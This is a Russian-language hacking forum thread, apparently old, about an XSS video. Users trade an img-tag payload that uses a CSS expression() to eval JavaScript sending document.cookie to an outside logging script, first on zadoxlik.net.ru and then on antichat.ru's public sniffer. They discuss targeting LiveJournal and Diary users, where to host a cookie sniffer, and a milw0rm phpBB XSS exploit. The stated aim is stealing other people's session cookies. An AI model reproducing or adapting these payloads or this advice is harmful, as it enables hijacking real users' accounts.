Видео Zadoxlik'a по XSS
 

Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

Учить js надо.
А нахера на народе?
На народе не получится...

Мне не обязательно на народе. Главное чтоб мне пришло.) На каком бесплатном хостинге получится?

Да, если можно, то объясните асё по-подробней :)

Никак. Куки пересылаются GET запросом к скрипту, где в QUERY_STRING (строка с параметрами запроса) располагается содержимое куков. Скрипт принимает их и записывает в файл. Т.к. на народе серверные скрипты размещать нельзя, то и сниффер там установить тоже нельзя.

Можеш на Holm.ru сделать себе сниффер
Кроме этого можеш использовать сниффер античата и сделать подписку и все придет тебе на мыло.

Ну раз на народе нельзя, то первое время поюзаю античатовский сниффер. Вот так код верен?

<*img src="http://antichat.ru/sniff/log.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://antichat.ru/sniff/log.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

В ЖЖ сейчас это прикрыли

Ну а сплойт верный? Я ещё может на дайри попробую.

Неверный.

не понял, что это http://www.milw0rm.com/id.php?id=1095 ?????

А какой XSS Exploit есть на phpbb2.0.15-17. На 2.0.15 пробовал тот експлойт по ссылке http://www.milw0rm.com/id.php?id=1095 - в сообщении видно.

значить уже пофиксили если не пашет. Рабочего нет.
И вообще ИМХО тему не поэтому тут создали. Интересно что там делает
CCTEAM PhpBB 2.0.16 XSS EXPLOIT
Powered by D|ablo CCTEAM ?

/* DESTROYED */

Поговорил с Тристамом, он сказал что никаких Дьябло в их тиме нет. Так что на сстим в этом случае нападать ненадо. Их подставил какой-то неумный доброжелатель )